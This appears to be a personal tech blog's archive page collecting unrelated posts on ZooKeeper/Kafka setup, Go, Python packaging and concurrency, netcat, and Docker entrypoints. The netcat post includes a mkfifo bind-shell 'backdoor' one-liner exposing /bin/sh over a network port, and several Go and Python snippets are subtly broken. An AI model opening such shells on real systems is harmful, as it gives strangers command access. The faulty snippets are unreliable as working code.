The Vagrant demo file please see my git repo Infratree

Introduction

Zookeeper quorum architecture, at least 3 nodes cluster setup via Vagrant for Kafka use. Hght level information about zk:

  • distributed key value store
  • has voting mechanism
  • used by many big data tools

Zookeeper role in Kafka:

  • broker registration, heart-beating check
  • maintaining a list of topics alongside
  • leader election
  • store kafka cluster id
  • store ACLs if security is enabled
  • quotas config if enabled

使用kafka自带的zookeeper 还是 独立的zookeeper呢?见这个回答参考. 工作项目中还是用的独立的zk. Zookeeper is going to be removed from kafka, see this article.

More references please see Zookeeper main page. System Requirements for version 3.6.2: ZooKeeper (also Kafka) runs in Java, release 1.8 or greater (JDK 8 LTS, JDK 11 LTS, JDK 12 - Java 9 and 10 are not supported).

Archive download link. For example, here uses Zookeeper version 3.6.2.

Performance Factors

Latency is key for zookeeper:

  • fast disk
  • no RAM swap
  • separate disk for snapshots and logs
  • high performance network
  • resonable number of zk servers
  • isolation zk process from others

Cluster Setup

Architecture

Clustered (Multi-Server) Setup. 这里面说了很多注意事项, 比如Java heap size to avoid swapping or disable swapping.

The architecture diagram of this experiment, co-locate zk and kafka in the same node, this is not recommended on production.

1
2
3
4
5
6
7
8
9
10
11
12
// zk leader can be anyone of them

192.168.20.20 192.168.20.21 192.168.20.22
|--------------| |-----------------| |----------------|
| zk server1<--|----|--> zk server2<--|----|-->zk server3 |
| follower | | leader | | follower |
| | | / | \ | | |
| | | / | \ | | |
| /--|----|---/ | \---|----|--\ |
| kafka / | | kafka | | \kafka |
| broker1 | | broker2 | | broker3 |
|--------------| |-----------------| |----------------|

Config

Generate zoo.cfg file in each node:

1
2
3
4
5
6
7
# download release binary version 3.6.2
cd /root
wget https://archive.apache.org/dist/zookeeper/zookeeper-3.6.2/apache-zookeeper-3.6.2-bin.tar.gz
tar -zxf apache-zookeeper-3.6.2-bin.tar.gz

cd /root/apache-zookeeper-3.6.2-bin/conf
cp zoo_sample.cfg zoo.cfg

Create zk data, log and conf directories in each zookeeper node:

1
2
3
mkdir -p /root/zk/data
mkdir -p /root/zk/log
mkdir -p /root/zk/conf

Edit zoo.cfg file for each zookeeper instance, use the same configuration for them:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# the basic time unit in milliseonds used by zk
tickTime=2000
#Leader-Follower初始通信时限 tickTime * 10 = 20 seconds
initLimit=10
#Leader-Follower同步通信时限 tickTime * 5 = 10 seconds
syncLimit=5

# data dir
dataDir=/root/zk/data
# log dir
dataLogDir=/root/zk/log

# client port, 3 nodes use the same port number
clientPort=2181
#maxClientCnxns=60

# broker id and IP address, or using hostname from /etc/hosts
# for cluster, borker id must start from 1, not 0

# 2888: connect the individual follower nodes to the leader node
# 3888: used for leader election in the ensemble
# can by any port number
server.1=192.168.20.20:2888:3888
server.2=192.168.20.21:2888:3888
server.3=192.168.20.22:2888:3888

In zk data directory, create myid for each zk instance, much be unqiue:

1
2
3
4
5
6
# current in 192.168.20.20
echo 1 > /root/zk/data/myid
# run on 192.168.20.21
echo 2 > /root/zk/data/myid
# run on 192.168.20.22
echo 3 > /root/zk/data/myid

Commands

Run zk service commands:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
cd /root/apache-zookeeper-3.6.2-bin/bin
# start
# default uses zoo.cfg config file
# run in background by default, has flag to run in foreground
./zkServer.sh start [path/to/zoo.cfg]
# stop
./zkServer.sh stop [path/to/zoo.cfg]

# status check
# Mode: standalone, follower, leader
./zkServer.sh status [path/to/zoo.cfg]

# test zk is good
# ipv6 + port
./zkCli.sh -server :2181
# then run
# you will see some output like [zookeeper], etc
ls /

[x] why port 2181 is bound on ipv6? 其他环境上也是如此。

After start zookeeper, check ./zkServer.sh status to see if current node is leader or follower. Run ./zkCli.sh, you can execute zk CLI, see this reference.

./zkCli.sh 也可用于从外部连接一个zk server, 只要指定accessable IP 和 port即可,demo中由于就在本机,所以其实是localhost.

If start failed, see <zk package>/logs/zookeeper_audit.log, If you don’t start another 2 zk instance, you will see periodically exception errors in <zk package>/logs/zookeeper-root-server-kafka1.out, it will be resolved after you start all of them. The log setting is by log4j configuration from <zk package>/conf/log4j.properties.

After the cluster is up and running, you can check the ports:

1
2
3
4
5
6
7
8
9
10
# see 2181, 2888, 3888
# -i: network socket
# -P: show port number
# -n: shpw ip address
lsof -i -P -n

# scan 2181
# -z: scan only
# -v: verbose
nc -zv <zk instance ip> 2181

在旧版本中,可以使用four letter words去检查一些状态,比如:

1
2
# are you ok
echo ruok | nc locahost 2181

新版本已经切换到AdminServer. The AdminServer is enabled by default, access by http 8080 port:

1
2
3
4
5
6
7
8
# list all commands
http://192.168.20.20:8080/commands

# for example:
# state
http://192.168.20.20:8080/commands/stat
# config
http://192.168.20.20:8080/commands/configuration

ZooNavigator is a web based ZooKeeper UI and editor/browser with many features. You can launched it by docker container.

Run as Daemon

Set zookeeper as system daemon so that it will be launched every time on system boots.

systemd zookeeper cluster setup on ubuntu, see here.

Basically speaking, first generate a zookeeper service file, for example zookeeper.service, the prefix zookeeper is the service name used in systemctl command. Place this file in /etc/systemd/system folder and owned by root.

Double curly brackets is placeholder in jinja2 template.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
[Unit]
Description=Zookeeper Daemon
Documentation=http://zookeeper.apache.org
# boot after these services
# for example, here we rely consul and dnsmasq services
After=network-online.target consul.service dnsmasq.service
StartLimitInterval=200
StartLimitBurst=5

[Service]
# in zkServer.sh, it uses `&` to fork and exec
Type=forking
# systemd can identify the main process of the daemon
# in zkServer.sh it will echo pid to this file
PIDFile={{ zookeeper_data_dir }}/zookeeper-server.pid

User={{ zookeeper_user }}
Group={{ zookeeper_group }}
WorkingDirectory=/opt/zookeeper

# environment variables may be needed
# or configure in zoo.cfg file
Environment=ZOOPIDFILE={{ zookeeper_data_dir }}/zookeeper-server.pid
Environment=ZOOKEEPER_HOME=/opt/zookeeper
Environment=ZOOKEEPER_CONF={{ zookeeper_conf_dir }}
Environment=ZOOCFGDIR={{ zookeeper_conf_dir }}
Environment=CLASSPATH=$CLASSPATH:$ZOOKEEPER_CONF:$ZOOKEEPER_HOME/*:$ZOOKEEPER_HOME/lib/*
Environment=ZOO_LOG_DIR={{ zookeeper_log_dir }}
Environment=ZOO_LOG4J_PROP=INFO,ROLLINGFILE
Environment=JVMFLAGS=-Dzookeeper.log.threshold=INFO
Environment=ZOO_DATADIR_AUTOCREATE_DISABLE=true

# start, stop and reload commands
ExecStart=/opt/zookeeper/bin/zkServer.sh start {{ zookeeper_conf_dir }}/zoo.cfg
ExecStop=/opt/zookeeper/bin/zkServer.sh stop {{ zookeeper_conf_dir }}/zoo.cfg
ExecReload=/opt/zookeeper/bin/zkServer.sh restart {{ zookeeper_conf_dir }}/zoo.cfg

# OOM killer: -1000 disable ~ 1000 very likely
OOMScoreAdjust=-500
Restart=on-failure
RestartSec=30

[Install]
# usually this is your system default target
WantedBy=multi-user.target

More detail about systemd please search and see my systemd blog.

Then you must enable zookeeper starts on boot:

1
2
3
systemctl daemon-reload
# enable start on boot
systemctl enable zookeeper

Other systemd commands:

1
2
3
4
5
6
7
8
systemctl start zookeeper
systemctl stop zookeeper
systemctl restart zookeeper

# reload config without restart
systemctl reload zookeeper
# first try relaod, if not supports then restart
systemctl reload-or-restart zookeeper

Struct

Go 用struct 实现OOP, 匿名字段可看作实现了继承关系,子类也可以重写父类的方法。

Note, there is also exported and unexported fields in struct, the same pattern like exported and unexported variable, func and method.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
// Person 在Student中成为了匿名字段
// 直接被访问,也叫提升字段
type Person struct {
name string
age int
}

type Student struct {
Person // 匿名字段,模拟继承结构 or *Person
school string
}

type Student struct {
person Person // 普通嵌套字段,必须逐层访问
school string
}
// You can declare a method on non-struct types, too.

// method,会自动关联到对应的struct
// non-pointer receiver is not common! please don't use it!
func (p Person) getName() {
return p.name
}

// 指针类型 is used to modify struct variable!
// Since methods often need to modify their receiver
// pointer receivers are more common than value receivers.
func (p *Person) setAge() {
p.age = p.age + 10
}

// Student子类重写了 Person 父类的方法
func (s Student) getName() {
return "studnet " + s.name
}

func main() {
s1 := Student{Person: Person{name: "xxx", age:12}, school: "yyy"}
// or omit the field name:
s1 := Student{Person{"xxx", 12}, school: "yyy"}
// 匿名字段 和 嵌套字段(逐层)的访问
// 因为提升字段的原因,可以把Person省掉
// s1.name or s1.Person.name
// s1.age or s1.Person.age
// s1.school

// vaule s1 calls a pointer receiver method
s1.setAge() // call is interpreted as (&s1).setAge()

s2 := &Person{"people", 23}
// pointer s2 calls a value receiver method
s2.getName() // call is interpreted as (*s2).getName()
}

Interface

在Go中,interface 定义方法的声明signature,具体类型实现方法的定义.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
// interface define
type Usb interface {
// normal function definition
start()
end()
}

type Mouse struct {
name string
}

// 实现接口,会自动关联
// 相当于Java 中 class xxx implements xxx
// 虽然这里没有写出来interface的名字
// 不能写成(m *Mouse)
func (m Mouse) start() {
fmt.Println("Mouse start")
}
func (m Mouse) end() {
fmt.Println("Mouse end")
}

// 测试使用接口
func testUsb(usb Usb) {
// usb 实际上就是实现了接口的Mouse
usb.start()
usb.end()
}

m := Mouse {name: "xxx"}
testUsb(m)

// 或者声明interface 变量
var u Usb
// u 不能访问 m 的字段
u = m
u.start()
u.end()

空接口,没有方法,所以可以认为所有类型都实现了它,可以用作函数的参数去接收任何数据类型。 The main usage of empty interface is func arguments.

1
2
3
4
5
6
7
8
9
10
11
12
type A interface {}
// because all type implicitly implements empty interface
// so we can use interface{} as var type
var a1 A = "hello"
var a2 A = 123
var a3 A = true
var a4 interface{} = "hello"

// map value存储任意类型
var map1 = make(map[string]interface{})
// slice 存储任意类型
var slice1 = make([]interface{})

注意fmt.Println() 就是这么实现的,用的匿名的空接口。

1
2
3
4
// 可变参数 + 匿名空接口
func Println(a ...interface{}) (n int, err error) {
return Fprintln(os.Stdout, a...)
}

How to 判断接口对应的具体类型呢,语法:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
// instance: 解析后的实际类型
// ok: true or false
// 接口对象: 接口名
// 实际类型: 猜测的实际类型
instance := 接口对象.(实际类型) // panic may occur
instance, ok := 接口对象.(实际类型) // safe way

switch 接口对象.(type) {
case string:
...
case int:
...
case Person:
...
}

举例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
type A interface {}

// 实例的指针值也可以传进来
func getType(a A) {
// 判断a 具体是什么类型
if ins, ok := a.(int), ok {

}
// 结构体类型
// 如果传进来的是指针,则写成,a.(*Person)
if ins, ok := a.(Person), ok {

}

// 或者用switch
switch ins := a.(type) {
case int:
// pass
case Person:
// pass
}
}

接口还可以多继承, 实现C的类型必须要实现C中自身和继承的所有的方法:

1
2
3
4
5
6
7
8
9
10
11
12
13
type A interface {
testA()
}

type B interface {
testB()
}

type C interface {
A
B
testC()
}

最近在做Project的时候发现一个package无法在jump box之外的机器上通过pip安装,后来发现这是一个内部开发的python package, 并且为jump box的pip做了设置,加入了内部的package repo address/credential。关于package 的创建和发布还不是很了解,这里专门总结一下。 Python Packaging User Guide

Package and Module

Packages contains modules (module is normally a single python source file) or other packages. Modules also are objects with special attributes.

1
2
3
4
5
6
7
8
9
10
11
12
13
## urllib is package because it contains other modules or packages
## request is a nested module
import urllib.request
from urllib import request

## although both are marked as module type
type(urllib)
type(urllib.request)

## show you the package location
urllib.__path__
## error, because only package has this attribute
urllib.request.__path__

How does python know where to import?

1
2
3
4
5
import sys
## for system built-in modules
sys.path
## you can manipulate on it
sys.path.append("<path>")

Or specify in environment variable (see python --help):

1
2
## will append to sys.path
export PYTHONPATH=path1:path2:path3

Package Structure

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
package/:
| ## init usually is empty, > 3.3 version, it is optional
| ## but explicitly have it is good
|--- __init__.py
|--- module1.py
|--- module2.py
|
|--- subpackage1/
| |
| |--- __init__.py
| |--- module3.py
|
|--- subpackage2/
|
|--- __init__.py
|--- module4.py

When import package, __init__.py will be executed if it has contents, so you can have init code here. module1.py and modul2.py are normal python source files, subpackage1 and subpackage2 are nested packages that has its own module. module1.py can import subpackage1 resources, and so on.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
## absolute imports
import package
import package.module1
from package import module2

import package.subpackage1
from package.subpackage1 import module3

## relative imports
## for example, in module3 it wants to use something in module4
## .. the same meaning in bash `cd` command
from ..subpackage2 import module4

## other forms
from . import sth
from .. import sth

Note that relative import can only be used to import modules within the current top-level package and can only in the form if from ... import.

Sometimes you will see __all__ in __init__.py, it control the public objects you can use when from .. import *. If you want to import other modules or packages manually, it is fine.

Namespace Package

For splitting a single python package across multiple directories on disk. Namespace package may not have __init__.py.

For example, split package1 to different path: path1 and path2, 注意这里package1 top-level 没有__init__.py.

1
2
3
4
5
6
7
8
9
10
11
12
13
path1/
|
|--- package1/
|
|--- module1.py
|--- ## other packages

path2/
|
|--- package1/
|
|--- module2.py
|--- ## other packages

When import:

1
2
3
4
5
6
7
8
9
import sys
## must include both paths
sys.path.extend()['path1', 'path2']

import package
## you will see 2 paths
package.__path__
import package.module1
import package.module2

Executable Directory

You can execute a directory if it contains __main__.py, then you can zip the directory and run the zip file.

1
2
3
4
directory/
|
|--- __main__.py
|--- ## other modules or packages

注意directory 没有__init__.py,它不是一个package.

1
2
3
4
5
6
7
8
## it will run __main__.py
python directory

## zip it
cd directory
python -m zipfile -c ../directory.zip *
## run it
python directory.zip

这就相当于打包了一个executable,别人使用时就不需要安装其他依赖了。

Executable Package

if you want to execute a package, also need to adds __main__.py, you cannot use __init__.py since it is only executed when import.

1
2
3
4
5
package/
| ## you can wrap the function here
|--- __main__.py
|--- __init__.py
|--- ## other modules or packages
1
2
## run it, arguments will be read by __main__.py
python -m package <arguments>

Package Layout

This is the recommended structure:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
project_name/
|
|--- REAMDME.rst
|--- doc/
|--- src/
| | ## package is here
| |--- package/
| ## unit test code
|--- tests/
| |
| |--- test_code.py
| ## use setuptolls package
|--- setup.py
| ## see later discussion
|--- tox.ini

The setup.py for example:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import setuptools

setuptools.setup(
name="<package name>",
version="<version number>",
author="chengdol",
author_email="chengdol@xxx.com",
description="...",
url="<package access url>",
packages=setuptools.find_packages('src'),
package_dir={'': 'src'},
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=['Flask==3.0.0', 'pysocks', 'pyyaml'],
)

关于tox, 是一个方便自动化测试的工具: tox: Automate and standardize testing in Python.

后面讲了plugins的实现 via setuptools or namespace packages. 目前没用到。

Package Distribution

When you create a virtualenv, there are pip, wheel and setuptools installed already.

There are source and built distrubutions, built package can place directly into installation directory and can be platform-specific, it is a .whl file. source package is tar.gz file, need to build before installing it. If you run pip download, you will see these distribution files.

For source package:

1
2
3
4
5
6
cd package
python setup.py sdist

## you will see a xxx.tar.gz file
cd dist
pip install xxx.tar.gz

For built package:

1
2
3
4
5
6
7
8
9
cd package
python setup.py bdist_wheel

## you will see a xx-py3-none-any.whl file
cd dist
## py3: python 3
## none: ABI requiremens, work with other language
## any: platform specifc
pip install xx-none-any.whl

Reading about what is wheel: https://realpython.com/python-wheels/ A Python .whl file is essentially a ZIP (.zip) archive with a specially crafted filename that tells installers what Python versions and platforms the wheel will support.

A wheel is a type of built distribution. In this case, built means that the wheel comes in a ready-to-install format and allows you to skip the build stage required with source distributions.

Then you register account on PyPI and upload the package:

1
2
3
4
5
6
7
8
9
## install twine
python -m pip install --user --upgrade twine

cd package
python setup.py sdist bdist_wheel && \
twine upload dist/* -u ${USER_NAME} -p ${PASSWORD}

## or upload to your personal repo
twine upload --repository-url ${PACKAGES_REPO} dist/* -u ${USER_NAME} -p ${PASSWORD}

Tools used: twine: Twine is a utility for publishing Python packages on PyPI.

After uploading you can use pip install the paclage in your new virtual environment.

I almost forget this command, but recently I used it as a TCP client to test Envoy TCP proxy. nc can also be a TCP server that listening on port and waiting for connection.

Install

1
2
3
4
5
# install nc (netcat)
# on centos
yum install -y nc
# on ubuntu
apt install -y netcat

Note that some nc version may support different features and options, please read man first!!

Usage Example

Test networking between 2 machines is good:

1
2
3
4
5
6
7
8
9
# on one machine, set up listener
# default is tcp
# -l: listen
# -k: keep connection
nc -lk 1555

# on another machine
# talk to listener
echo "from client" | nc <ip> 1555

I used to set up a UDP client to test logstash input UDP plugin and pipeline.

Proxy

Connection via proxy, see man nc:

1
2
3
4
5
6
# https connect
nc -x10.2.3.4:8080 -Xconnect host.example.com 42

# proxy authentication
# -P: proxy user
nc -x10.2.3.4:8080 -Xconnect -Pruser host.example.com 42

Port Scan

Port scanning to know which ports are open and running services on target machine:

1
2
3
4
5
6
7
8
9
10
11
12
13
# -v: verbose
# -z: Zero-I/O mode, report connection status only
# -w: timeout second

# scan port 22 and 8080
nc -v -w 2 -z 127.0.0.1 22 8080

# range scan
nc -v -w 2 -z 127.0.0.1 1-10004

# -n: don't perform DNS resolution
nc -v -w 2 -n -z 8.8.8.8 53
# Connection to 8.8.8.8 53 port [tcp/domain] succeeded

Transfer

Data transfer, also see man nc

1
2
3
4
5
6
# content will be put to filename.out
nc -l 1234 > filename.out

# feed it with filename.in
# -N: disconnet when finish
nc -N host.example.com 1234 < filename.in

For folder transfer:

1
2
3
4
5
6
7
# note there is a - after tar command, used as input
# after done you will see the folder
nc -v -l 1234 | tar zxf -

# - here is used as output
# -N: close connection when is done
tar czf - folder | nc -N -v <ip> 1234

Other ways to transfer files: scp, sftp, python http server.

Server Client

Client/Server model, a chat server, can talk in either way:

TCP server and client

1
2
3
4
5
6
7
8
# server 
# -l: listening
# -vv: verbose
# -p: listening on port 3000
nc -lk -vv -p 3000
# client
# -p: use port 6666 to connect to 3000
nc localhost -p 6666 3000

UDP server and client

1
2
3
4
# server
nc -u -lk localhost 515
# client
nc -u localhost 515

Actually you can use it in script:

1
2
3
4
5
6
#!/bin/bash
# it well block until get the message
message=$(nc -l -p 1234)

# in another script, interesting
echo hi > /dev/tcp/localhost/1234

Backdoor

Execute command on remote via backdoor opened by nc, see nc’s manual

1
2
3
4
5
6
7
8
9
10
11
12
13
# server side, mk a named pipe
rm -f /tmp/f; mkfifo /tmp/f
# -i: interactive shell
# cat pipe's content sent by client to interactive shell
# then redirect the output to pipe to show it on client side
cat /tmp/f | /bin/sh -i 2>&1 | nc -l 0.0.0.0 1234 > /tmp/f
# remove after done
rm -f /tmp/f

# client side
nc <server ip> 1234
# prompt a interactive shell
# then run command on remote server

Reviewer Sheet

Right after the title, list stakeholders in sheet:

1
2
3
4
Username | Role      | Status   | Last Change
| Reviewer | Pending | 2023-01-23
| Approver | Approved |
| | Waiting |

Document profile

  • Author: xxx
  • Contributors: xxx
  • Intended audience: xxx
  • Created: xxx
  • Latest update date: xxx
  • Visibility: public| confidential | need to know
  • Status: draft | review | current | needs update | obsolete
  • Self-link: xxx
  • Team: xxx
  • Hotlist/ticket: xxxx

Sections

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
# Context
## TL;DR
## Objective

# Requirements

# Design/Proposal (stopgap vs fullfleged solution)
## Preferred Approach
chart: Pros | Cons | Effort
## Alternative Considered
chart: Pros | Cons | Effort
## code fragment/proto, etc

# Comparison Analysis
## Reusability
## Backward Compatibility
## Ownership
## Leve of effort required
## Maintainability
## Testability
## Scalability

# High level architecture
# High level workflow (sequence diagram)

# Compliance
# Dependencies
# Integration Test
# Implementation Plan / Roadmap
# Reference

Diagram

Open source versatile tools to help with diagram:

这里把Python concurrency的内容单独拿出来整理一下, 主要是multithreading, multiprocessing and asyncio.

根据需要选择适合场景的concurrency pattern, typs of concurrency (here we talk running app on a single machine): Parallel programming Working with multi-process cores, suited for CPUs intensive tasks (CPU-bound tasks): solving the problem rather than reading to or writing from a device. Better CPU gets better performance:

  • String operations
  • Search algorithns
  • Graphics processing

Asynchronous programming Suited for IO intensive tasks (IO-bound tasks): most of time reading to or writing from a device, Either to disk or to a network. 经常和callback function一起实现,或者使用future, promise or task, 主线程可以检查完成情况, use cases:

  • Databse reads, writes
  • Web service calls
  • Copying, downloading, uploading data

Python Concurrency

Python has concurrency support as the diagram shows:

1
2
3
4
5
6
7
8
9
10
11
12
13
+---------------------------------------------------+
| |
| concurrent.futures (3.2+) |
| |
| +-------------------+ +------------------------+ |
| | threading (1.5+) | | multiprocessing (2.6+) | |
| +-------------------+ +------------------------+ |
+---------------------------------------------------+

+------------+
| asyncio |
| (3.4+) |
+------------+

这里要提一下subprocessmultiprocessing modules的区别:

Git Repo

Demo code without threads and mulitprocessing: https://github.com/tim-ojo/python-concurrency-getting-started

In newer version, Logging is disabled by pytest, need to explicitly enable it:

1
pytest -p no:logging

Threading

这里的介绍已经说得很清楚了: https://docs.python.org/3/library/threading.html

如果有多个cores, threads running in parallel, if only single core, threads share time on that core.

A process starts with a main thread (注意main thread并不是这个process, process就像一个container, 提供资源和环境,thread才是真正用来执行任务), the main thread spawns other worker threads. 不过仅仅使用thread的基本并发功能有很多缺陷,比如thread interference, race condition.

这里说一下Python threading 的局限, GIL(Global Interpreter Lock), only one Python thread can run at a time, it is not true concurrency, it is a cooperative multithreading, so using Python threads in IO-bound tasks rather than CPU-bound tasks.

GIL workarounds:

  • Jython (write python wrapped by Java)
  • IronPython
  • Python Multiprocessing
  • concurrent.futures.ProcessPoolExecutor

如何构造threads呢? You can pass callable object (function) to constructor, the Thread class is defined as

1
2
class threading.Thread(group=None, target=None, name=None, args=(), kwargs={}, *, daemon=None):
pass

For example:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import threading

def do_some_work(val):
print ("doing some work in thread")
print ("echo: {}".format(val))
return

val = "text"
## pass callable to constructor
## args is tuple
t=threading.Thread(target=do_some_work,args=(val,))
## start thread t
t.start()
## main thread waits until called thread terminates
t.join()

Or by overriding the run() method in a subclass. No other methods (except for the constructor) should be overridden in a subclass. In other words, only override the __init__() and run() methods of this class.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import threading

class FibonacciThread(threading.Thread):
def __init__(self, num):
Thread.__init__(self)
self.num = num

def run(self):
fib=[0]*(self.num + 1)
fib[0] = 0
fib[1] = 1
for i in range(2, self.num + 1):
fib[i] = fib[i - 1] + fib[i - 2]
print fib[self.num]

myFibTask1 = FibonacciThread(9)
myFibTask2 = FibonacciThread(12)
myFibTask1.start()
myFibTask2.start()

myFibTask1.join()
myFibTask2.join()

Thread interference, a typical example is bank account deposit and withdraw, a race condition may occur. To synchronze threads, can use lock (primitive or reentrant)

  • primitive lock, any thread can release it.
  • reentrant lock, only holder can release, can be acquired multiple times, by the same thread.

Lock benefit: faster then other thread sync mechanisms.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import threading

## not owned by a particular thread
## create in main thread
lock = threading.Lock()

## call in work threads
## automically acquire and release lock
with lock:
pass ## do something

## use try-finally block
lock.acquire()
try:
pass ## do something
finally:
lock.release()

## check is the lock is acquired
lock.locked()

Semaphore: maintains a set of permits. Semaphores are often used to guard resources with limited capacity, for example, a database server.

1
2
3
4
5
6
7
8
9
10
## create in main thread, default permit is 1
## BoundedSemaphore can prevent release operation number exceeds acquire's
maxconnections = 5
pool_sema = threading.BoundedSemaphore(maxconnections)

## call in worker threads
## automically acquire and release semaphore
with pool_sema:
## connect to the database server
pass

Events: This is one of the simplest mechanisms for communication between threads: one thread signals an event and other threads wait for it.

1
2
3
4
5
6
7
8
9
10
11
12
13
import threading
## initially false
event = threading.Event()

## work thread
## block until event is set to true
event.wait()

## main thread
## set to true
event.set()
## set to false
event.clear()

Conditions: combine lock and event, used for producer-consumer pattern.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import threading

cond = threading.Condition()
## consumer
cond.acquire()
while not an_item_is_available():
## wait will release lock
## Once awakened, it re-acquires the lock and returns.
cond.wait()
get_an_available_item()
cond.release()

## producer
cond.acquire()
make_an_item_available()
## Since notify() does not release the lock, its caller should.
cond.notify()
cond.release()

感觉这个还比较有用: Inter-thread communication using queues. Python的queue module实际上是一个synchronized queue class, 用来threaded programming. 4 common methids: put(), get(), task_done(), join(). The put and get calls are blocking call.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
from queue import Queue
from threading import Thread

def img_down(producer):
while not producer:
try:
url = producer.get(block=False)
## do sth
producer.task_done()
except producer.Empty:
## write some logs

## image download queue
producer = Queue()
urls = ["https://image1", "https://image2", "https://image3"]
for url in urls:
producer.put(url)

## specify only 2 threads to download
num_thread = 2
for i in range(num_thread):
t = Thread(target=img_down, args=(producer,))
t.start()

producer.join()

Multiprocessing

Process benefits:

  • sidesteps GIL, one GIL for every python process.
  • less need for synchronization.
  • can be paused and terminated.
  • more resilient, one crash will not bring down other prcesses.

multiprocessing is a package that supports spawning processes using an API similar to the threading module.

1
import multiporcessing

picklable arguments: serializing and deserializing.

Pool, apply_async, apply inter-process communication: pipe and queue

AsycnIO

I have a post Shell Arguments Format talked about exec "$@" (当时并没有在意为什么在docker中这么使用), the script docker-entrypoint.sh is a very common and flexible way to accept different parameters when start docker container and run application as PID 1, this allows the application to receive any Unix signals sent to the container (之前遇到过这个问题, 非PID 1的进程在对container 的终止signal 没有反应).

See this docker best practice about entrypoint: https://docs.docker.com/develop/develop-images/dockerfile_best-practices/#entrypoint

The same pattern in envoy image, see this docker-entrypoint.sh link:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#!/usr/bin/env sh
set -e

# shell parameter expansion
# if LOGLEVEL is null or unset, then assign null to it
# env variable can set from `-e` with docker run
loglevel="${LOGLEVEL:-}"

# if the first argument looks like a parameter (i.e. start with '-'), run Envoy
# ${1#-} 的意思是对于第一个positional parameter, 是不是以-开头
# ${1#-} expand 的结果是去掉最短的match部分
if [ "${1#-}" != "$1" ]; then
# re-set $@ value
# see below explanation
set -- envoy "$@"
fi

# have CMD ['envoy'] in dockerfile
# this is the default parameter to entrypoint
if [ "$1" = 'envoy' ]; then
# set the log level if the $loglevel variable is set
if [ -n "$loglevel" ]; then
# 更新位置参数
set -- "$@" --log-level "$loglevel"
fi
fi

# ENVOY_UID is the environment variables you specified
# to set envoy userid/group
if [ "$ENVOY_UID" != "0" ]; then
if [ -n "$ENVOY_UID" ]; then
usermod -u "$ENVOY_UID" envoy
fi
if [ -n "$ENVOY_GID" ]; then
groupmod -g "$ENVOY_GID" envoy
fi
# Ensure the envoy user is able to write to container logs
chown envoy:envoy /dev/stdout /dev/stderr

# su-exec switch user exec
# https://github.com/ncopa/su-exec
su-exec envoy "${@}"
else
# becomes PID 1
# 注意有double quote
exec "${@}"
fi

For example:

1
2
3
4
5
6
7
8
# start as bash
docker run --rm -it envoy_image_name:tag bash

# pass parameters `--help` and run
docker run --rm -it envoy_image_name:tag --help

# run as default CMD `envoy` with ENTRYPOINT
docker run --rm -it -e ENVOY_UID=1001 -e LOGLEVEL="info" envoy_image_name:tag

The new thing to me is set --, see this question: What does “set --” do in this Dockerfile entrypoint?

The set -- command sets the positional parameters and link new tokens with existing position parameters, The -- is the standard “don’t treat anything following this as an option”,也就是说这是要排列位置参数了,而不是重置位置参数:

1
2
3
4
5
6
7
8
set a b c
# output "a b c"
echo $1 $2 $3

# 相当于$@ = newToken "$@"
set -- newToken "$@"
# it actually exec "newToken a b c"
exec "${@}"

Nginx Entrypoint

Let’s see one more about nginx docker entrypoint and explain:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#!/bin/sh
# vim:sw=4:ts=4:et

set -e

# if quiet log, then redirect to /dev/null
# otherwise redirect to 1 (stdout)
if [ -z "${NGINX_ENTRYPOINT_QUIET_LOGS:-}" ]; then
# link file descriptor 3(additional) to 1 (stdout)
# 3 is file descriptor see below explanation

# exec can preserve the setting
exec 3>&1
else
exec 3>/dev/null
fi
# why use new fd 3: 3 is used by echo later, easy to manage redirect to where

# -o: or
if [ "$1" = "nginx" -o "$1" = "nginx-debug" ]; then
if /usr/bin/find "/docker-entrypoint.d/" -mindepth 1 -maxdepth 1 -type f -print -quit 2>/dev/null | read v; then
# redirect message from 1 (implicitly) to 3 (stdout in essence)
# echo >&3 facilitate reading, see below explanation
echo >&3 "$0: /docker-entrypoint.d/ is not empty, will attempt to perform configuration"

echo >&3 "$0: Looking for shell scripts in /docker-entrypoint.d/"
find "/docker-entrypoint.d/" -follow -type f -print | sort -V | while read -r f; do
case "$f" in
*.sh)
# -x: file exists and executable
if [ -x "$f" ]; then
echo >&3 "$0: Launching $f";
"$f"
else
echo >&3 "$0: Ignoring $f, not executable";
fi
;;
*) echo >&3 "$0: Ignoring $f";;
esac
done

echo >&3 "$0: Configuration complete; ready for start up"
else
echo >&3 "$0: No files found in /docker-entrypoint.d/, skipping configuration"
fi
fi

# process replacement
exec "$@"

Explanation:

Previously I had a post talked about the login and non-login shell, please note that is a different concept with nologin user here.

